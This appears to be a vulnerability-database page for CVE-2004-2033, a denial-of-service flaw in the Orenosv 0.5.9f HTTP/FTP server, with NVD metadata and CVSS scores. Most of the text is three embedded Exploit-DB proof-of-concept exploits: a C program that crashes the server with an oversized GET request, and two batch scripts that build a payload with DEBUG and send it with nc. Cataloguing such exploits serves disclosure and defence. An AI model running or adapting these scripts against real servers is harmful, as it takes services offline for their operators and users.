Search...

CVE-2004-2033

2004-05-26T04:00:00

ID CVE-2004-2033
Type cve
Reporter cve@mitre.org
Modified 2017-07-11T01:31:00

Description

Orenosv 0.5.9f allows remote attackers to cause a denial of service (crash) via a long HTTP GET request.

JSON Vulners Source

Initial Source

{"id": "CVE-2004-2033", "bulletinFamily": "NVD", "title": "CVE-2004-2033", "description": "Orenosv 0.5.9f allows remote attackers to cause a denial of service (crash) via a long HTTP GET request.", "published": "2004-05-26T04:00:00", "modified": "2017-07-11T01:31:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2033", "reporter": "cve@mitre.org", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/16250", "http://www.securityfocus.com/bid/10420", "http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html", "http://www.osvdb.org/6419", "http://secunia.com/advisories/11706", "http://marc.info/?l=bugtraq&m=108559623703422&w=2"], "cvelist": ["CVE-2004-2033"], "type": "cve", "lastseen": "2019-05-29T18:08:04", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "568fbacdf4ce8f1be8a782b43e1cf3ba"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a59ccfdf5dc9e5974ce48de3259cb88e"}, {"key": "cpe23", "hash": "58f3fe6d50fb5471b9e5613e877e04f1"}, {"key": "cvelist", "hash": "163e6a522b5dff61efb0e0a9399a6b59"}, {"key": "cvss", "hash": "41b62a8aa1ee5c40897717cadc30784a"}, {"key": "cvss2", "hash": "85fc9715d07b57d9e72056856b007c7b"}, {"key": "cvss3", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cwe", "hash": "78a7a5cbaf09985c14389298e454e7db"}, {"key": "description", "hash": "9e6039814a1e7ae1d13482823f0636c0"}, {"key": "href", "hash": "40fb3510d51b7aa0fb7c249147186d0f"}, {"key": "modified", "hash": "523ab2b584257b356b93ab54fd2d1554"}, {"key": "published", "hash": "c3086b44b2e6d6f507b3bbd6bb1655ff"}, {"key": "references", "hash": "10341068643571bbe320e9235b8becb5"}, {"key": "reporter", "hash": "444c2b4dda4a55437faa8bef1a141e84"}, {"key": "title", "hash": "e4d71ce5fd7b504fd21ef22c4b22da5c"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "a43c87f0419a35a94c2536cb3c08b0556cad96dc861367a3191674c3722d2a23", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:24147", "EDB-ID:24146", "EDB-ID:24145"]}], "modified": "2019-05-29T18:08:04"}, "score": {"value": 5.1, "vector": "NONE", "modified": "2019-05-29T18:08:04"}, "vulnersScore": 5.1}, "objectVersion": "1.3", "cpe": ["cpe:/a:orenosv:orenosv_http_ftp_server:0.5.9e", "cpe:/a:orenosv:orenosv_http_ftp_server:0.5.9f", "cpe:/a:orenosv:orenosv_http_ftp_server:0.5.9c"], "affectedSoftware": [{"name": "orenosv orenosv_http_ftp_server", "operator": "eq", "version": "0.5.9f"}, {"name": "orenosv orenosv_http_ftp_server", "operator": "eq", "version": "0.5.9c"}, {"name": "orenosv orenosv_http_ftp_server", "operator": "eq", "version": "0.5.9e"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:a:orenosv:orenosv_http_ftp_server:0.5.9f:*:*:*:*:*:*:*", "cpe:2.3:a:orenosv:orenosv_http_ftp_server:0.5.9c:*:*:*:*:*:*:*", "cpe:2.3:a:orenosv:orenosv_http_ftp_server:0.5.9e:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"]}

{"exploitdb": [{"lastseen": "2016-02-02T22:37:16", "bulletinFamily": "exploit", "description": "Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial Of Service Vulnerability (3). CVE-2004-2033. Dos exploit for windows platform", "modified": "2004-06-02T00:00:00", "published": "2004-06-02T00:00:00", "id": "EDB-ID:24147", "href": "https://www.exploit-db.com/exploits/24147/", "type": "exploitdb", "title": "Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial of Service Vulnerability 3", "sourceData": "source: http://www.securityfocus.com/bid/10420/info\r\n \r\nOrenosv HTTP/FTP server is prone to a denial of service vulnerability that may occur when an overly long HTTP GET request is sent to the server. When the malicious request is handled, it is reported that both the HTTP and FTP daemons will stop responding.\r\n\r\n@echo off\r\n::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\r\n:Application: Orenosv FTP Server\r\n:Vendors: http://home.comcast.net/~makataoka//orenosv060.zip\r\n:Version: <=0.6.0\r\n:Platforms: Windows\r\n:Bug: D.O.S\r\n:Date: 2004-06-02\r\n:Author: CoolICE\r\n:E-mail: CoolICE#China.com\r\n::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\r\n;if '%1'=='' echo Usage:%0 target [port]&&goto :eof\r\n;set PORT=21\r\n;if not '%2'=='' set PORT=%2\r\n;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe\r\necho Need nc.exe&&goto :eof\r\n;DEBUG < %~s0\r\n;GOTO :run\r\n\r\nF 100 200 41\r\nrcx\r\n100\r\nndos.a\r\nw\r\nq\r\n\r\n\r\n:run\r\nnc %1 %PORT% < dos.a\r\ndel dos.a\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24147/"}, {"lastseen": "2016-02-02T22:36:59", "bulletinFamily": "exploit", "description": "Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial Of Service Vulnerability (1). CVE-2004-2033. Dos exploit for windows platform", "modified": "2004-05-25T00:00:00", "published": "2004-05-25T00:00:00", "id": "EDB-ID:24145", "href": "https://www.exploit-db.com/exploits/24145/", "type": "exploitdb", "title": "Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial of Service Vulnerability 1", "sourceData": "source: http://www.securityfocus.com/bid/10420/info\r\n\r\nOrenosv HTTP/FTP server is prone to a denial of service vulnerability that may occur when an overly long HTTP GET request is sent to the server. When the malicious request is handled, it is reported that both the HTTP and FTP daemons will stop responding. \r\n\r\n/****************************/\r\n PoC to crash the server\r\n/****************************/\r\n\r\n/* Orenosv HTTP/FTP Server Denial Of Service\r\n\r\n Version:\r\n orenosv059f\r\n\r\n Vendor:\r\n http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html\r\n\r\n Coded and Discovered by:\r\n badpack3t <badpack3t@security-protocols.com>\r\n .:sp research labs:.\r\n www.security-protocols.com\r\n 5.25.2004\r\n */\r\n\r\n#include <winsock2.h>\r\n#include <stdio.h>\r\n\r\n#pragma comment(lib, \"ws2_32.lib\")\r\n\r\nchar exploit[] =\r\n\r\n/* 420 A's - looks ugly but owell */\r\n\"GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0\\r\\n\\r\\n\";\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n WSADATA wsaData;\r\n WORD wVersionRequested;\r\n struct hostent *pTarget;\r\n struct sockaddr_in sock;\r\n char *target;\r\n int port,bufsize;\r\n SOCKET mysocket;\r\n\r\n if (argc < 2)\r\n {\r\n printf(\"Orenosv HTTP/FTP Server DoS by badpack3t\\r\\n\\r\\n\", argv[0]);\r\n printf(\"Usage:\\r\\n %s <targetip> [targetport] (default is 9999)\\r\\n\\r\\n\", argv[0]);\r\n printf(\"www.security-protocols.com\\r\\n\\r\\n\", argv[0]);\r\n exit(1);\r\n }\r\n\r\n wVersionRequested = MAKEWORD(1, 1);\r\n if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;\r\n\r\n target = argv[1];\r\n port = 9999;\r\n\r\n if (argc >= 3) port = atoi(argv[2]);\r\n bufsize = 1024;\r\n if (argc >= 4) bufsize = atoi(argv[3]);\r\n\r\n mysocket = socket(AF_INET, SOCK_STREAM, 0);\r\n if(mysocket==INVALID_SOCKET)\r\n {\r\n printf(\"Socket error!\\r\\n\");\r\n exit(1);\r\n }\r\n\r\n printf(\"Resolving Hostnames...\\n\");\r\n if ((pTarget = gethostbyname(target)) == NULL)\r\n {\r\n printf(\"Resolve of %s failed\\n\", argv[1]);\r\n exit(1);\r\n }\r\n\r\n memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);\r\n sock.sin_family = AF_INET;\r\n sock.sin_port = htons((USHORT)port);\r\n\r\n printf(\"Connecting...\\n\");\r\n if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))\r\n {\r\n printf(\"Couldn't connect to host.\\n\");\r\n exit(1);\r\n }\r\n\r\n printf(\"Connected!...\\n\");\r\n printf(\"Sending Payload...\\n\");\r\n if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)\r\n {\r\n printf(\"Error Sending the Exploit Payload\\r\\n\");\r\n closesocket(mysocket);\r\n exit(1);\r\n }\r\n\r\n printf(\"Payload has been sent! Check if the webserver is dead.\\r\\n\");\r\n closesocket(mysocket);\r\n WSACleanup();\r\n return 0;\r\n}\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24145/"}, {"lastseen": "2016-02-02T22:37:07", "bulletinFamily": "exploit", "description": "Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial Of Service Vulnerability (2). CVE-2004-2033. Dos exploit for windows platform", "modified": "2004-06-02T00:00:00", "published": "2004-06-02T00:00:00", "id": "EDB-ID:24146", "href": "https://www.exploit-db.com/exploits/24146/", "type": "exploitdb", "title": "Orenosv HTTP/FTP Server 0.5.9 HTTP GET Denial of Service Vulnerability 2", "sourceData": "source: http://www.securityfocus.com/bid/10420/info\r\n \r\nOrenosv HTTP/FTP server is prone to a denial of service vulnerability that may occur when an overly long HTTP GET request is sent to the server. When the malicious request is handled, it is reported that both the HTTP and FTP daemons will stop responding.\r\n\r\n@echo on\r\n::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\r\n:Application: Orenosv Server\r\n:Vendors: http://home.comcast.net/~makataoka/orenosv060.zip\r\n:Version: <=0.6.0\r\n:Platforms: Windows\r\n:Bug: D.O.S\r\n:Date: 2004-06-02\r\n:Author: CoolICE\r\n:E-mail: CoolICE#China.com\r\n::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\r\n;if '%1'=='' echo Usage:%0 target [port]&&goto :eof\r\n;set PORT=9999\r\n;if not '%2'=='' set PORT=%2\r\n;for %%n in (nc.exe) do if not exist %%~$PATH:n if not exist nc.exe\r\necho Need nc.exe&&goto :eof\r\n;DEBUG < %~s0\r\n;GOTO :run\r\n\r\ne 100 \"GET / HTTP/1.0\" 0D 0A\r\ne 110 \"Transfer-Encoding: Boy\" 0D 0A 0D 0A\r\nrcx\r\n2A\r\nnhttp.tmp\r\nw\r\nq\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/24146/"}]}